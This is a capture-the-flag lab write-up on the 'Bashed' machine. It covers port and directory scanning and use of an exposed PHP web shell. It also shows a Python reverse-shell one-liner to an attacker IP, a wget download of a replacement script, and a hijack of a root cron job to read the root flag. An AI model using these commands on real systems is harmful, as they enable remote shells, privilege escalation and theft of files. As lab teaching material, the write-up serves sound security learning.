# Bashed ### Initial Enumeration Nmap scan for all TCP ports ```bash sudo nmap -T4 -p- -oN T-all 10.10.10.68 ``` ```bash # Nmap 7.70 scan initiated Tue Jul 2 23:33:14 2019 as: nmap -T4 -p- -oN T-all 10.10.10.68 Nmap scan report for 10.10.10.68 Host is up (0.24s latency). Not shown: 65534 closed ports PORT STATE SERVICE 80/tcp open http # Nmap done at Tue Jul 2 23:44:27 2019 -- 1 IP address (1 host up) scanned in 672.99 seconds ``` Only 1 attack vector i.e. port 80 HTTP server. ```bash sudo nmap -p 80 -sV -sC -oN O-Detailed 10.10.10.68 ``` ```bash # Nmap 7.70 scan initiated Tue Jul 2 23:37:00 2019 as: nmap -p 80 -sV -sC -oN O-Detailed 10.10.10.68 Nmap scan report for 10.10.10.68 Host is up (0.23s latency). PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Arrexel's Development Site Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Tue Jul 2 23:37:12 2019 -- 1 IP address (1 host up) scanned in 12.61 seconds ``` No searchsploit results for the particular version of the Apache HTTPd Server. ![Page with 1 single post that suggests that ](https://3859502357-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Lipzhcjodrl0Qw14cdW%2F-LiwCFioYl6kPMJiymKA%2F-LiwE7EiYD_J7rTGC0wz%2Fimage.png?alt=media\&token=e22fae8b-4377-4077-a237-15c16f0dc869) Ran gobuster on the server to get a few directories to explore ```bash gobuster dir -t 50 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster-medium -u http://10.10.10.68 ``` ```bash /uploads (Status: 301) /images (Status: 301) /php (Status: 301) /css (Status: 301) /dev (Status: 301) /js (Status: 301) /fonts (Status: 301) ``` `Uploads` and `Dev` seemed interesting. However, `uploads` was empty. ![](https://3859502357-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Lipzhcjodrl0Qw14cdW%2F-LiwCFioYl6kPMJiymKA%2F-LiwK1pvFKEPp5408SgT%2Fimage.png?alt=media\&token=666febf2-10f2-49de-84e8-8f60131ce779) `phpbash.php` got us the web-shell already installed on the server with `www-data` user. ![](https://3859502357-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Lipzhcjodrl0Qw14cdW%2F-LiwCFioYl6kPMJiymKA%2F-LiwKFXAze82ViHELnun%2Fimage.png?alt=media\&token=e2a1ae0f-1d24-4e8f-b5f2-a3d9a423f82d) ### User Own ``` > cat /home/arrexel/user.txt 2c281*** ``` ### Root Own Another thing to notice was user `www-data` is able to run `sudo` as `scriptmanager` without a password and there's an interesting folder owned by `scriptmanager` in the root directory. ![](https://3859502357-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Lipzhcjodrl0Qw14cdW%2F-LiwCFioYl6kPMJiymKA%2F-LiwKuYkTS6Y4dVtoMjH%2Fimage.png?alt=media\&token=8a238213-96a6-401c-97f4-35bb6ad38f44) ![](https://3859502357-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Lipzhcjodrl0Qw14cdW%2F-LiwCFioYl6kPMJiymKA%2F-LiwL4pK7k8x99_pSfSf%2Fimage.png?alt=media\&token=5bec5999-9170-4d57-88eb-e265fa8c1cb0) ```bash sudo -u scriptmanager ls -la /scripts ``` ```bash total 16 drwxrwxr-- 2 scriptmanager scriptmanager 4096 Dec 4 2017 . drwxr-xr-x 23 root root 4096 Dec 4 2017 .. -rw-r--r-- 1 scriptmanager scriptmanager 58 Dec 4 2017 test.py -rw-r--r-- 1 root root 12 Jul 4 02:44 test.txt [TIME CHANGED] ------------------------------ -rw-r--r-- 1 root root 12 Jul 4 03:03 test.txt [TIME CHANGED] ``` To run `LinEnum.sh` I got a reverse shell from the existing web-shell. Using the python server I downloaded the `LinEnum.sh` file onto the server and ran to see what all was interesting. ```bash sudo -u scriptmanager python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.13",8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' & ``` There was nothing too exciting in the output except the fact that there were some `crontabs` registered for the user `root`. As evident from the listings of the folder /scripts/ the text file was being generated every minute as stated above. The code which was being run was `test.py` ```python f = open("test.txt", "w") f.write("testing 123!") f.close ``` As evident from the permissions, this file can be modified by the `scriptmanager` user and hence can be used to our leverage. Craft the following python script on the attacker system, transfer, and replace the file on the machine and wait for the output. ```python import os cmd = "cat /root/root.txt > /tmp/root" os.system(cmd) ``` ```bash sudo -u scriptmanager wget http://10.10.14.13:9999/script.py -O /scripts/test.py ``` After 1 minute we will have our `root flag` in the `/tmp/root` file. ![](https://3859502357-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Lipzhcjodrl0Qw14cdW%2F-LiwCFioYl6kPMJiymKA%2F-LiwR2-1FnCA8tqJcplH%2Fimage.png?alt=media\&token=3954a29f-1d17-470c-852b-b0c0bd8b9935) ```bash > cat /tmp/root cc4f0*** ``` ### Learning outcome Having a closer look at suspiciously owned root files, as these may give out important information, as in this case the change in time every minute was the clue to a root owned `cron tab`.